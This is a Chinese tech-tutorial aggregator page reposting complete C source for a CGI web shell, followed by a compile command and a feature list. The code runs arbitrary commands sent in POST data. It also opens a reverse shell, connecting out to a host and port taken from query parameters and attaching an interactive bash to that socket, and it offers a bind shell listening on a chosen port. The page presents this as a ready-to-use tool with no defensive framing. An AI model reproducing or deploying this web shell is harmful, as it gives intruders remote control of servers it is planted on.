LinuxC代码实现cgishell
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了LinuxC代码实现cgishell,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含6568字,纯文字阅读大概需要10分钟。
内容图文
![LinuxC代码实现cgishell](/upload/InfoBanner/zyjiaocheng/151/29b51cb4d8874b7fbe566f0c38e56521.jpg)
#include#include #include #include #include #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include #include #include struct get_data { char key[100]; char value[100]; }; void exec_cmd(void){ printf("Content-type:text/html\n\n"); FILE *command; int size = atoi(getenv("CONTENT_LENGTH")); if(size > 1500) { printf("Error> Post Data is very big"); exit(0); } char *buffer = malloc(size+1); fread(buffer,1,size,stdin); command = popen(buffer,"r"); char caracter; while((caracter = fgetc(command))){ if(caracter == EOF) break; printf("%c",caracter); } pclose(command); free(buffer); exit(0); } int error(char *err){ perror(err); exit(EXIT_FAILURE); } void parser_get(void){ printf("Content-type:text/html\n\n"); struct get_data *s; char *GET = (char *)getenv("QUERY_STRING"); int i,number_of_get = 0,size_get = strlen(GET); if(strlen(GET) > 100) exit(0); s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data)); int element = 0; int positionA = 0; int positionB = 0; int id = 0; for(i=0;i<size_get;i++){ if(GET[i] == '='){ id = 1; s[element].key[positionA] = '\0'; positionB = 0; continue; } if(GET[i] == '&'){ id = 0; s[element].key[positionA] = '\0'; s[element].value[positionB] = '\0'; positionA = 0; positionB = 0; element++; continue; } if(id==0){ s[element].key[positionA] = GET[i]; positionA++; } if(id==1){ s[element].value[positionB] = GET[i]; positionB++; } if(i == size_get-1 && GET[size_get-1] != '&'){ s[element].key[positionA] = '\0'; s[element].value[positionB] = '\0'; element++; continue; } } char *host_x = (char *)malloc(100); host_x = NULL; char *type_x = (char *)malloc(100); type_x = NULL; int port_x = 0; for(i=0;i<element;i++){ if(strcmp(s[i].key,"type")==0) type_x = s[i].value; else if(strcmp(s[i].key,"host")==0) host_x = s[i].value; else if(strcmp(s[i].key,"port")==0) port_x = atoi(s[i].value); } free(s); if(type_x == NULL){ free(type_x); free(host_x); exit(0); } if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){ printf("Something is wrong ... !!!"); free(type_x); free(host_x); exit(0); } if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){ printf("You must specify a target host ..."); free(type_x); free(host_x); exit(0); } if(strcmp(type_x,"reverse") == 0){ struct sockaddr_in addr; int msocket; msocket = socket(AF_INET,SOCK_STREAM,0); if(msocket < 0){ printf("Fail to create socket"); free(host_x); free(type_x); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port_x); addr.sin_addr.s_addr = inet_addr(host_x); memset(&addr.sin_zero,0,sizeof(addr.sin_zero)); if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){ printf("Fail to connect\n"); free(host_x); free(type_x); exit(0); } printf("Connect with sucess !!!\n"); if(fork() == 0){ close(0); close(1); close(2); dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2); execl("/bin/bash","bash","-i", (char *)0); close(msocket); exit(0); } free(host_x); free(type_x); exit(0); } else if (strcmp(type_x,"bind")==0) { int my_socket, cli_socket; struct sockaddr_in server_addr,cli_addr; if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("Fail to create socket"); exit(1); } server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port_x); server_addr.sin_addr.s_addr = INADDR_ANY; bzero(&(server_addr.sin_zero), 8); int optval = 1; setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval); if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){ printf("Fail to bind"); free(host_x); free(type_x); exit(1); } if (listen(my_socket, 1) < 0){ printf("Fail to listen"); free(host_x); free(type_x); exit(1); } else { printf("Listen on port %d\n",port_x); } if(fork() == 0){ socklen_t tamanho = sizeof(struct sockaddr_in); if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){ exit(0); } close(0); close(1); close(2); dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2); execl("/bin/bash","bash","-i",(char *)0); close(cli_socket); } } free(host_x); free(type_x); exit(0); } void load_css_js(void){ printf("\n\ \n\ "); } int main(void){ if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd(); if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get(); printf("Content-type:text/html\n\n"); printf("\n"); printf("\t\n\t\n"); printf("\t\t C CGI SHELL =D \n"); load_css_js(); printf("\n\t\n"); printf("\t\n"); printf(" \n\ \n\C - CGI SHELL
C0d3r: webshell | REVERSE/BIND\n\ \n\ <input type=\"text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\ <input id=\"lol\" type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">
\n\ \n\ \n\ \n\Reverse Connection: Stop\n\ \n\<input type=\"text\" id='port_rev' onkeypress='return change_div(event,this);' onKeyUp='update_div(this,\"cmd_rev\");' />\n\ <input type='button' value='Start Connection' style=\"margin-left: 15.5em;\" onclick=\"connect_xxx('rev_s')\"/>\n\ \n\
\n\Bind Connection: Stop\n\<input type=\"text\" id='port_bin' style=\"width:50px\" onkeypress='return change_div(event,this);' onKeyUp='update_div(this,\"cmd_bin\");'>\n\ <input type='button' value='Start Connection' style=\"margin-left: 15.5em;\" onclick=\"connect_xxx('bind_s')\"/>\n\ \n\ \n\ \n\ \n\ \n\ "); return 0; }
编译:
gcc shell.c -o shell.cgi
功能:
1.反弹获得shell(target作为客户端)
2.监听获得shell(target作为服务端)
3.命令行执行
内容总结
以上是互联网集市为您收集整理的LinuxC代码实现cgishell全部内容,希望文章能够帮你解决LinuxC代码实现cgishell所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。